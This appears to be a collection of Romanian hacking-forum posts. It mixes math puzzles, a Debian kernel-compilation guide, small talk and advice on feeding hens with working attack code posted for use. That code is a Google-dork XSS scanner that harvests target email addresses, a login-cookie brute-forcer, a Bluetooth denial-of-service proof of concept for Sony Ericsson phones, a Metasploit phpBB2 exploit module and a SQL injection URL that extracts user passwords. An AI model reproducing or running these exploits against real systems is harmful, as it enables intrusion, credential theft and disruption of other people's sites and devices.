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  1. zbeng


    Cazul tau nu se pune la tine e alt ceva=))
  2. zbeng

    python scaner

    XSS scanner #!/usr/bin/python #XSS Scanner that can find hosts using a google query or search one site. #If XSS is found it attempts to collect email addresses to further your attack #or warn the target of the flaw. When the scan is complete #it will print out the XSS's found and or write to file, it will find false positives #so manually check before getting to excited. It also has verbose mode and #you can change the alert pop-up message, check options!! # ##Changelog v1.1: added options, verbose, write to file, change alert #Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback #Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed #some user input problems, exiting without error messages with Ctrl-C (KeyboardInterrupt) # #d3hydr8[at]gmail[dot]com import sys, urllib2, re, sets, random, httplib, time, socket def title(): print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3" print "\t-----------------------------------------------" def usage(): title() print "\n Usage: python XSSscan.py <option>\n" print "\n Example: python XSSscan.py -g inurl:'.gov' 200 -a 'XSS h4ck3d' -write xxs_found.txt -v\n" print "\t[options]" print "\t -g/-google <query> <num of hosts> : Searches google for hosts" print "\t -s/-site <website> <port>: Searches just that site, (default port 80)" print "\t -a/-alert <alert message> : Change the alert pop-up message" print "\t -w/-write <file> : Writes potential XSS found to file" print "\t -v/-verbose : Verbose Mode\n" def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text def timer(): now = time.localtime(time.time()) return time.asctime(now) def geturls(query): counter = 10 urls = [] while counter < int(sys.argv[3]): url = 'http://www.google.com/search?hl=en&q='+query+'&hl=en&lr=&start='+repr(counter)+'&sa=N' opener = urllib2.build_opener(url) opener.addheaders = [('User-agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)')] data = opener.open(url).read() hosts = re.findall(('\w+\.[\w\.\-/]*\.\w+'),StripTags(data)) #Lets add sites found to a list if not already or a google site. #We don't want to upset the people that got our list for us. for x in hosts: if x.find('www') != -1: x = x[x.find('www'):] if x not in urls and re.search("google", x) == None: urls.append(x) counter += 10 return urls def getemails(site): try: if site.split("/",1)[0] not in done: print "\t[+] Collecting Emails:",site.split("/",1)[0] webpage = urllib2.urlopen(proto+"://"+site.split("/",1)[0], port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) done.append(site.split("/",1)[0]) if emails: return emails except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(IndexError): pass def getvar(site): names = [] actions = [] print "\n","-"*45 print "[+] Searching:",site try: webpage = urllib2.urlopen(proto+"://"+site, port).read() emails = re.findall('[\w\.\-]+@[\w\.\-]+\.\w\w\w', webpage) var = re.findall("\?[\w\.\-/]*\=",webpage) if len(var) >=1: var = list(sets.Set(var)) found_action = re.findall("action=\"[\w\.\-/]*\"", webpage.lower()) found_action = list(sets.Set(found_action)) if len(found_action) >= 1: for a in found_action: a = a.split('"',2)[1] try: if a[0] != "/": a = "/"+a except(IndexError): pass actions.append(a) found_names = re.findall("name=\"[\w\.\-/]*\"", webpage.lower()) found_names = list(sets.Set(found_names)) for n in found_names: names.append(n.split('"',2)[1]) print "[+] Variables:",len(var),"| Actions:",len(actions),"| Fields:",len(names) print "[+] Avg Requests:",(len(var)+len(names)+(len(actions)*len(names))+(len(actions)*len(names)))*len(xss_payloads) if len(var) >= 1: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+v+xss) for xss in xss_payloads: tester(site+"/"+v+xss) if len(names) >= 1: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+"/"+"?"+n+"="+xss) for xss in xss_payloads: tester(site+"/"+"?"+n+"="+xss) if len(actions) != 0 and len(names) >= 1: for a in actions: for n in names: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+"?"+n+"="+xss) #tester(site.split("/")[0]+a+"?"+n+"="+xss) if len(actions) != 0 and len(var) >= 1: for a in actions: for v in var: if site.count("/") >= 2: for x in xrange(site.count("/")): for xss in xss_payloads: tester(site.rsplit('/',x+1)[0]+a+v+xss) else: for xss in xss_payloads: tester(site.split("/")[0]+a+v+xss) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) except(socket.timeout, IOError, ValueError, socket.error, socket.gaierror): if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": urls.remove(site) pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) def tester(target): if verbose ==1: if message != "": print "Target:",target.replace(alert ,message) else: print "Target:",target try: source = urllib2.urlopen(proto+"://"+target, port).read() h = httplib.HTTPConnection(target.split('/')[0], int(port)) try: h.request("GET", "/"+target.split('/',1)[1]) except(IndexError): h.request("GET", "/") r1 = h.getresponse() if verbose ==1: print "\t[+] Response:",r1.status, r1.reason if re.search(alert.replace("%2D","-"), source) != None and r1.status not in range(303, 418): if target not in found_xss: if message != "": print "\n[!] XSS:", target.replace(alert ,message) else: print "\n[!] XSS:", target print "\t[+] Response:",r1.status, r1.reason emails = getemails(target) if emails: print "\t[+] Email:",len(emails),"addresses\n" found_xss.setdefault(target, list(sets.Set(emails))) else: found_xss[target] = "None" except(socket.timeout, socket.gaierror, socket.error, IOError, ValueError, httplib.BadStatusLine, httplib.IncompleteRead, httplib.InvalidURL): pass except(KeyboardInterrupt): print "\n[-] Cancelled -",timer(),"\n" sys.exit(1) except(): pass if len(sys.argv) <= 2: usage() sys.exit(1) for arg in sys.argv[1:]: if arg.lower() == "-v" or arg.lower() == "-verbose": verbose = 1 if arg.lower() == "-w" or arg.lower() == "-write": txt = sys.argv[int(sys.argv[1:].index(arg))+2] if arg.lower() == "-a" or arg.lower() == "-alert": message = re.sub("\s","%2D",sys.argv[int(sys.argv[1:].index(arg))+2]) title() socket.setdefaulttimeout(3) found_xss = {} done = [] count = 0 proto = "http" alert = "D3HYDR8%2D0wNz%2DY0U" print "\n[+] XSS_scan Loaded" try: if verbose ==1: print "[+] Verbose Mode On" except(NameError): verbose = 0 print "[-] Verbose Mode Off" try: if message: print "[+] Alert:",message except(NameError): print "[+] Alert:",alert message = "" pass xss_payloads = ["%22%3E%3Cscript%3Ealert%28%27"+alert+"%27%29%3C%2Fscript%3E", "%22%3E<IMG SRC=\"javascript:alert(%27"+alert+"%27);\">", "%22%3E<script>alert(String.fromCharCode(68,51,72,89,68,82,56,45,48,119,78,122,45,89,48,85));</script>", "'';!--\"<%27"+alert+"%27>=&{()}", "';alert(0)//\';alert(1)//%22;alert(2)//\%22;alert(3)//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(%27"+alert+"%27)%3C/SCRIPT%3E=&{}%22);}alert(6);function", "</textarea><script>alert(%27"+alert+"%27)</script>"] try: if txt: print "[+] File:",txt except(NameError): txt = None pass print "[+] XSS Payloads:",len(xss_payloads) if sys.argv[1].lower() == "-g" or sys.argv[1].lower() == "-google": try: if sys.argv[3].isdigit() == False: print "\n[-] Argument [",sys.argv[3],"] must be a number.\n" sys.exit(1) else: if int(sys.argv[3]) <= 10: print "\n[-] Argument [",sys.argv[3],"] must be greater than 10.\n" sys.exit(1) except(IndexError): print "\n[-] Need number of hosts to collect.\n" sys.exit(1) query = re.sub("\s","+",sys.argv[2]) port = "80" print "[+] Query:",query print "[+] Querying Google..." urls = geturls(query) print "[+] Collected:",len(urls),"hosts" print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(3) while len(urls) > 0: print "-"*45 print "\n[-] Length:",len(urls),"remain" getvar(random.choice(urls)) if sys.argv[1].lower() == "-s" or sys.argv[1].lower() == "-site": site = sys.argv[2] try: if sys.argv[3].isdigit() == False: port = "80" else: port = sys.argv[3] except(IndexError): port = "80" print "[+] Site:",site print "[+] Port:",port if site[:7] == "http://": site = site.replace("http://","") if site[:8] == "https://": proto = "https" if port == "80": print "[!] Using port 80 with https? (443)" site = site.replace("https://","") print "[+] Started:",timer() print "\n[-] Cancel: Press Ctrl-C" time.sleep(4) getvar(site) print "-"*65 print "\n\n[+] Potential XSS found:",len(found_xss),"\n" time.sleep(3) if txt != None and len(found_xss) >=1: xss_file = open(txt, "a") xss_file.writelines("\n\td3hydr8[at]gmail[dot]com XSS Scanner v1.3\n") xss_file.writelines("\t------------------------------------------\n\n") print "[+] Writing Data:",txt else: print "[-] No data written to disk" for k in found_xss.keys(): count+=1 if txt != None: if message != "": xss_file.writelines("["+str(count)+"] "+k.replace(alert ,message)+"\n") else: xss_file.writelines("["+str(count)+"] "+k+"\n") if message != "": print "\n["+str(count)+"]",k.replace(alert ,message) else: print "\n["+str(count)+"]",k addrs = found_xss[k] if addrs != "None": print "\t[+] Email addresses:" for addr in addrs: if txt != None: xss_file.writelines("\tEmail: "+addr+"\n") print "\t -",addr print "\n[-] Done -",timer(),"\n"
  3. http://wobzip.filetap.com/ Maximum file size: 10 Mb [increased!] Formats supported: 7z, ZIP, GZIP, BZIP2, TAR, RAR, CAB, ISO, ARJ, LZHCHM, Z, CPIO, RPM, DEB and NSIS
  4. http://www.routerpasswords.com/index.asp
  5. use LWP::UserAgent; use HTTP::Cookies; $ua = new LWP::UserAgent; $jar = HTTP::Cookies->new(); $ua->cookie_jar($jar); open FH, "gudang_cookie.txt"; while (<FH>) { $ cookie_new = $_; chomp $cookie_new; $jar->set_cookie(1, remember Me => $cookie_new, "/", "xxx.xxx.xxx.xxx"); $req = new HTTP::Request GET => "http://blabla/login.php"; $res = $ua->request($req); $html = $res->content; if($html =~ /Wellcome/) { print "cookie " .$cookie_new. " U S E D ! \n"; } else { print "cookie " .$cookie_new. " WRONG !! \n"; } } and U must creat : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 etc and safe in txt > "gudang_cookie.txt"
  6. /* Sony/Ericsson reset display - PoC */ /* Pierre BETOUIN - [email]pierre.betouin@infratech.fr[/email] */ /* 05-02-2006 */ /* Vulnerability found using BSS fuzzer : */ /* Download [url]www.secuobs.com/news/05022006-bluetooth10.shml[/url] */ /* */ /* Causes anormal behaviours on some Sony/Ericsson */ /* cell phones */ /* Vulnerable tested devices : */ /* - K600i */ /* - V600i */ /* - K750i */ /* - W800i */ /* - And maybe other ones... */ /* */ /* Vulnerable devices will slowly turn their screen into */ /* black and then display a white screen. */ /* After a short period (~45sec), they will go back to */ /* their normal behaviour */ /* */ /* gcc -lbluetooth reset_display_sonyericsson.c */ /* -o reset_display_sonyericsson */ /* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <bluetooth/bluetooth.h> #include <bluetooth/hci.h> #include <bluetooth/l2cap.h> #define SIZE 4 #define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header) int main(int argc, char **argv) { char *buffer; l2cap_cmd_hdr *cmd; struct sockaddr_l2 addr; int sock, sent, i; if(argc < 2) { fprintf(stderr, "%s <btaddr>\n", argv[0]); exit(EXIT_FAILURE); } if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) { perror("socket"); exit(EXIT_FAILURE); } memset(&addr, 0, sizeof(addr)); addr.l2_family = AF_BLUETOOTH; if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(EXIT_FAILURE); } str2ba(argv[1], &addr.l2_bdaddr); if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("connect"); exit(EXIT_FAILURE); } if(!(buffer = (char *) malloc ((int) SIZE + 1))) { perror("malloc"); exit(EXIT_FAILURE); } memset(buffer, 90, SIZE); cmd = (l2cap_cmd_hdr *) buffer; cmd->code = L2CAP_ECHO_REQ; cmd->ident = 1; cmd->len = FAKE_SIZE; if( (sent=send(sock, buffer, SIZE, 0)) >= 0) { printf("L2CAP packet sent (%d)\n", sent); } printf("Buffer:\t"); for(i=0; i<sent; i++) printf("%.2X ", (unsigned char) buffer[i]); printf("\n"); free(buffer); close(sock); return EXIT_SUCCESS; }
  7. ## # $Id:$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # [url]http://metasploit.com/projects/Framework/[/url] ## require 'msf/core' module Msf class Exploits::Multi::Php::PHP_Unserialize_Zval_phpBB2 < Msf::Exploit::Remote include Exploit::Remote::Tcp include Exploit::Remote::HttpClient include Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (phpBB2)', 'Description' => %q{ This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets the phpBB2 web application and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger on phpBB2 (due the multiple Cookie headers requirement). Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid "jmp EDI" or "call EDI" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems. }, 'Author' => [ 'hdm', # module development 'GML <grandmasterlogic [at] gmail.com>', # module development and debugging 'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 3509 $', 'References' => [ ['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, }, 'Targets' => [ # # 64-bit SuSE: 0x005c0000 # Backtrack 2.0: 0xb797a000 # Gentoo: 0xb6900000 # [ 'Linux x86 phpBB2', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ], 'Bruteforce' => { 'Start' => { 'Ret' => 0xb6000400 }, 'Stop' => { 'Ret' => 0xbfff0000 }, 'Step' => 1024*1024 } } ] ], 'DisclosureDate' => 'Mar 04 2007')) register_options( [ OptString.new('URI', [true, "The full URI path to vulnerable PHP script", '/phpBB2/faq.php']), OptString.new('COOKIENAME', [true, "The prefix to use in front of cookie names", 'phpbb2mysql']) ], self.class) end def brute_exploit(target_addrs) zvalref = encode_semis('i:0;R:2;') # # Use this if we decide to do 'jmp edi' returns vs brute force # =begin # Linux specific egg-hunter tagger = "\x90\x50\x90\x50" hunter = "\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80" + "\x3c\xf2\x74\xf1\xb8" + tagger + "\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7" egghunter = "\xcc" * 39 egghunter[0, hunter.length] = hunter hashtable = "\xcc" * 39 hashtable[0, 2] = "\xeb\xc6" # jmp back 32 bytes hashtable[20, 4] = [target_addrs['Ret']].pack('V') hashtable[32, 4] = [target_addrs['Ret']].pack('V') =end # # Just brute-force addresses for now # tagger = '' egghunter = rand_text_alphanumeric(39) hashtable = rand_text_alphanumeric(39) hashtable[20, 4] = [target_addrs['Ret']].pack('V') hashtable[32, 4] = [target_addrs['Ret']].pack('V') # Generate and reuse the original buffer to save CPU if (not @saved_cookies) # Building the malicious request print_status("Creating the request...") # Create the first cookie header to get this started cookie_fun = "Cookie: #{datastore['COOKIENAME']}_data=" cookie_fun << Rex::Text.uri_encode( 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";'+ 'i:0;s:12:"012345678BAN";i:0;}' ) cookie_fun << zvalref * 500 cookie_fun << Rex::Text.uri_encode('s:2:"') cookie_fun << "\r\n" refcnt = 1000 refmax = 65535 # Keep adding cookie headers... while(refcnt < refmax) chead = 'Cookie: '; chead << encode_semis('";N;') # Stay within the 8192 byte limit 0.upto(679) do |i| break if refcnt >= refmax refcnt += 1 chead << zvalref end chead << encode_semis('s:2:"') cookie_fun << chead + "\r\n" end # The final header, including the hashtable with return address cookie_fun << "Cookie: " cookie_fun << Rex::Text.uri_encode('";N;') cookie_fun << zvalref * 500 @saved_cookies = cookie_fun end # Generate and reuse the payload to save CPU time if (not @saved_payload) @saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256) end cookie_addrs = Rex::Text.uri_encode( 's:39:"' + egghunter + '";s:39:"'+ hashtable +'";i:0;R:3;' ) + "\r\n" print_status("Trying address 0x%.8x..." % target_addrs['Ret']) res = send_request_cgi({ 'uri' => datastore['URI'], 'method' => 'POST', 'raw_headers' => @saved_cookies + cookie_addrs, 'data' => @saved_payload }, 1) if res print_status("Received a response: #{res.code} #{res.message}") else print_status("No response from the server") end end def encode_semis(str) str.gsub(';') { |s| sprintf("%%%.2x", s[0]) } end end end
  8. ######################################################################### # # [webchat 0.78] # # Class: SQL Injection # Published 28/06/2007 # Remote: Yes # Critical Level : Dangerous # Site: [url]http://sourceforge.net/projects/webdev-webchat/[/url] # Download: [url]http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0[/url] # Author: R00T[ATI] # Contact: [email]r00t.ati@gmail.com[/email] - [url]http://inclusionhunter.altervista.org/index.php[/url] # ######################################################################### Vulnerable code: login.php ====================================================== <? $q = new DB_Chat; $q->query("select * from room where rid='$rid'"); if ($q->next_record()) { ?> ======================================================= Exploit : ============================================================================================================ [url]http://www.site.com/[/url][web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/* ============================================================================================================ Thanks To: ====================================================== All Root@Shell members; White_Sheep; SparrowRulez; st0ke; ======================================================
  9. zbeng


    in ultimu timp yahoo are cam multe errori buguri.... eu cred ca ca va cadea yahoo in cateva saptamani sau in ceva timp voi ce credeti. uitati ce am patit eu azi
  10. zbeng

    Problema Z.1

    ala e mia sus facut de delight sau cum o fi Adevãrat sau fals ? 1. Dacã 3x(x-5)(2x+1) = 0, atunci x = 5. 2. Suma a douã numere iraþionale este tot un numãr iraþional. 3. Numãrul 0,16 este patrat perfect pentru cã 0,4 *0,4=0,16. 4. Între numerele 2/13 ºi 4/13 existã un singur numãr raþional: 3/13. 5. Numerele a ºi b se divid cu 17 <=> numãrul a+b se divide cu 17. 6. Mulþimea divizorilor unui numãr natural este finitã. 7. Mulþimea multiplilor unui numãr natural este infinitã.
  11. zbeng

    Problema Z.1

    z.3 adunare si scadere Se stie ca adunarea si scaderea sunt cele mai simple operatii ale aritmeticii. Si totusi. Daca vreti sa va amuzati putin - nu insa fara oarecare bataie de cap - incercati sa efectuati urmatoarea scadere: dintr-un numar care are suma cifrelor sale 45, scadeti un alt numar, compus din aceleasi cifre, care, la randul sau, are suma cifrelor tot 45, astfel incat restul sa aiba (ati ghicit probabil!) suma cifrelor tot 45! Cu acest prilej veti observa si o "coincidenta".
  12. zbeng

    Problema Z.1

    CE NUMAR AM ? Doua persoane, sa spunem A si B, stau fata in fata, fiecare avand in mana cate un carton. Pe spatele celor doua cartoane sunt scrise doua numere naturale nenule consecutive. Fiecare persoana poate vedea numarul scris pe cartonul celeilalte persoane, nu insa si numarul scris pe propriul carton. Intre ele, are loc urmatorul dialog: A - Nu stiu ce numar am ! B - Nu stiu ce numar am ! A - Nu stiu ce numar am ! B - Nu stiu ce numar am ! A - Nu stiu ce numar am ! B - Nu stiu ce numar am ! A - Nu stiu ce numar am ! B - Stiu ce numar am ! A - Stiu ce numar am ! Ce numere sunt scrise pe fiecare carton ?
  13. zbeng

    Problema Z.1

    1 d3light 2 kw3rln 3 unu care mia zis pe mes
  14. zbeng

    Problema Z.1

    raspunusurile pe pm
  15. zbeng

    Problema Z.1

    Sunt cinci case diferite, fiecare pictata in alta culoare. In fiecare casa locuieste o persoana de alta nationalitate, care prefera propria sa bautura, diferita de a celorlalti. Fiecare om are pe langa el un animal distinct si fumeaza o marca distincta de tigari. Se fac urmatoarele afirmatii: 1. Englezul locuieste in casa rosie. 2. Suedezul are un caine. 3. Danezul bea ceai. 4. Casa verde este la stanga casei pictata in alb. 5. Persoana din casa verde bea cafea. 6. Persoana care fumeaza Pall Mall creste pasari. 7. Persoana din casa galbena fumeaza Dunhill. 8. Persoana din casa din mijloc bea lapte. 9. Norvegianul locuieste in prima casa. 10. Persoana care fumeaza Blend locuieste in casa vecina celei unde se cresc pisici. 11. Persoana care creste cai locuieste langa cel care fumeaza Dunhill. 12. Persoana care fumeaza Blue Master bea bere. 13. Germanul fumeaza Prince. 14. Norvegianul locuieste alaturi de casa vopsita in albastru. 15. Cel care fumeaza Blend este vecin cu persoana care nu bea decat apa. Intrebarea este: Cine creste pesti ?
  16. kwe daca facem un topic toate problemele aici ca vad ca sau pus la moda jeje
  17. zbeng

    Problema 2

    si carei faza ce tre sa facem
  18. 1- Instalam kernel OeX:/home/oex# apt-get install gcc kernel-package kernel-source-2.4.18 libc6-dev tk8.3 libncurses5-dev fakeroot OeX:/home/oex# apt-get install kernel-source-2.6.8 OeX:/home/oex# cd /usr/src/ 2- Dezarhivam kernel OeX:/usr/src# tar -xvjf kernel-source-2.6.8.tar.bz2 aceasta comanda intarzie in functiune de procesorul dvs. 3- Configurand kernerul OeX:/usr/src# cd kernel-source-2.6.8 OeX:/usr/src/kernel-source-2.6.8# make menuconfig Selecionam optiunile calculatorului nostru. Cand iesim din aplicatie se face o arhiva ".config" cu toate optiunile noastre de kernel. Daca e prima data cand compilezi kernelu in compu tau,trebuie sa stii ca debian are toate module incarcate in kernel si le foloseste in functie de hardwarele dvs. Pentru optimizarea kernerului trebuie sa incarci numa partile care le necesitati,asta decizi in arhiva .config folosind comanda make menuconfig. O problema care am avuto cu kerneru este ca filesystem de ext3 din defect vine in module ext3_fs=m si nu porneste asa ca incarcati cu kerneru si gata EXT3_FS=y 4- Compiland kerneru OeX:/usr/src/kernel-source-2.6.8# make-kpkg --append-to-version=.160905 kernel_image --append-to-version=.160905 Asta foloseste ca sa dam o versiune pachetului .deb,asta va folosi ca sa faceti diferenta intre diferentele pachete,in cazul meu adaug 1609005 care de data 16/09/05 <--ast e un exemplu voi bagati data corecta. asta intarzie destul Daca totul merge bine o sa apara un fisier .deb in directorul /usr/src/ in cazul meu /usr/src/kernel-image- 5- Instaland kerneru OeX:/usr/src/kernel-source-2.6.8# cd .. OeX:/usr/src# dpkg -i kernel-image- Gata kerneru este instalat,acuam putem reinstala pc si sa probam noul kernel selectionand kernerul in start.
  19. zbeng


    tot am vazut ca ai "scuter" cand reusesti sa mergi pe roata din fatza ma suni
  20. zbeng


    acu vati dat seama ca FLAMA e nebun taree + cay gay
  21. zbeng


    nu ma bate gandu la asa ceva
  22. zbeng


    accepti o invitatie la o bautura alcolica sau un suc natural daca ajung prin bucuresti
  23. zbeng


    ceva gen cum sa aivem grija de animalele de pe langa casa cuprins 1-Gainile 2-Porci 1-GAINILE Este cunoscut faptul ca in cresterea intensiva a pasarilor, mai ales in unitatile industriale mari, acolo unde pasarile stau tot timpul in hale bine ventilate, in care temperatura, umiditatea si durata luminii se pastreaza la nivelurile necesare, pasarile sunt hranite cu nutret combinat.} Acest nutret combinat contine, in proportii potrivite pentru fiecare specie, rasa, varsta sau fel de productie, toate substantele hranitoare pe care pasarile trebuie sa le primeasca pentru a trai si pentru a da productiile mari de care sunt capabile. Nutreturile combinate se pot folosi si in mica gospodarie. Ele se procura, cu usurinta, de la fabricile specializate sau prin magazinele acestora. La prima vedere, insa, un nutret combinat pare scump, desi sporurile de productie pe care le asigura rascumpara cu prisosinta cheltuiala. Totusi, multi crescatori renunta la cumpararea unor asemenea furaje intrucat doresc sa foloseasca in hrana animalelor cerealele pe care le au din productia proprie. Desigur ca intr-un asemenea caz crescatorul care foloseste aproape numai cereale nu se poate astepta sa obtina de la pasarile sale decat cel mult o treime din posibilitatile acestora, adica numai 80-120 oua pe an. Cerealele si alte resurse furajere din gospodarie pot fi folosite totusi cu succes daca se alege una din urmatoarele doua solutii: folosirea unui concentrat proteic-vitamino-mineral (PVM) sau realizarea corecta a unui amestec furajer de ferma. Hranirea gainilor ouatoare cu cereale si PVM. Concentratele de proteine-vitamine si minerale contin toate substantele hranitoare dar care nu apar indestulatoare intr-o ratie pe baza de cereale. Aceste concentrate se dau in amestec cu cerealele uruite, indeosebi porumb (singur sau in amestec cu orz, grau, sorg, mei etc.), in proportie de 40% PVM (de tip A5-40) si 60% cereale. Daca se poate procura separat si srot de soia, sunt posibile alte proportii: 10% concentrat (de tip A5-10), 62% cereale, 20% srot soia si 8% creta furajera. Toate aceste componente, amestecate cat mai bine, se dau gainilor ouatoare in vase de hrana, fiind lasate la discretie daca este vorba de rase usoare si mixte sau date cu portia (150-180 g/zi de cap) la rasele grele (Plymouth, Cornish etc.). Desi aparent mai scump, un asemenea mod de hranire a gainilor ouatoare este mult mai rentabil, mai productiv, dupa cum rezulta si din cel mai simplu calcul comparativ. Astfel, daca se ia in considerare ca gainile consuma 40 kg nutret pe an si ca 1 kg concentrat PVM costa cam cat 3 kg porumb, rezulta in cele doua solutii: - o gaina care consuma anual 40 kg porumb, producand 100 oua/an, consuma 400 g porumb pentru un ou; - o gaina care consuma anual 16 kg concentrat (echivalent valoric cu 48 kg porumb) si 24 kg cereale, are un consum total al carui cost este egal cu valoarea unei cantitati de 72 kg porumb, dar produce anual 220-250 oua, consumand nutret evaluat valoric la 310 g porumb pentru un ou. In acest fel se pot obtine, in medie, de la o gaina, 4,5 oua/saptamana (fata de 2 oua/sapt.), iar costul furajului pentru un ou scade cu peste 25% (la preturile lunii in curs 66 lei/ou, fata de 86 lei/ou). Hranirea gainilor ouatoare cu amestec de ferma Un amestec de ferma corect realizat poate fi mai ieftin decat nutretul combinat si chiar decat cel alcatuit din cereale si concentrat PVM, dar pretinde mai multa munca si prezinta o serie de greutati in procurarea diferitelor materii prime furajere. Un exemplu de reteta pentru hranirea gainilor ouatoare poate fi urmatorul: cereale (porumb, orz, grau etc.) - 66%; srot de floarea-soarelui - 7%; srot de soia sau turte de floarea-soarelui - 18%; creta furajera (carbonat de calciu) - 7%; fosfat dicalcic - 0,4%; sare - 0,2% si Zoofort A5 (concentrat vitaminic A5) - 1%, care poate fi procurat prin FNC-uri. (Fabrici de Nutreturi Combinate). In aceasta reteta se observa proportia mare de creta, care este necesara pentru formarea cojii oualor si a carei lipsa duce la scaderea sau chiar la intreruperea ouatului. Dat fiind ca gainile mai bune ouatoare au nevoie de mai mult calciu, este bine sa li se lase la dispozitie, intr-un vas, o oarecare cantitate de creta, cochilii de scoici si fosfat de calciu. De asemenea, se recomanda ca zilnic sa se administreze suplimentar verdeata tanara (tocata) sau, iarna, morcov, frunze de fan si graunte incoltite, cu coltul alb (neinverzit) de 1-8 mm inaltime (ovaz incoltit timp de 7 zile), nutreturi care ridica valoarea comerciala a oualor prin galbenusul lor mai frumos colorat si mai gustos. Indiferent de modul in care crescatorul s-a hotarat sa-si hraneasca pasarile trebuie sa fie convins ca va putea sa obtina productii de oua cu adevarat mari si rentabile numai daca va asigura in nutret toate substantele hranitoare in proportiile recomandate. 2-PORCI cat de curand
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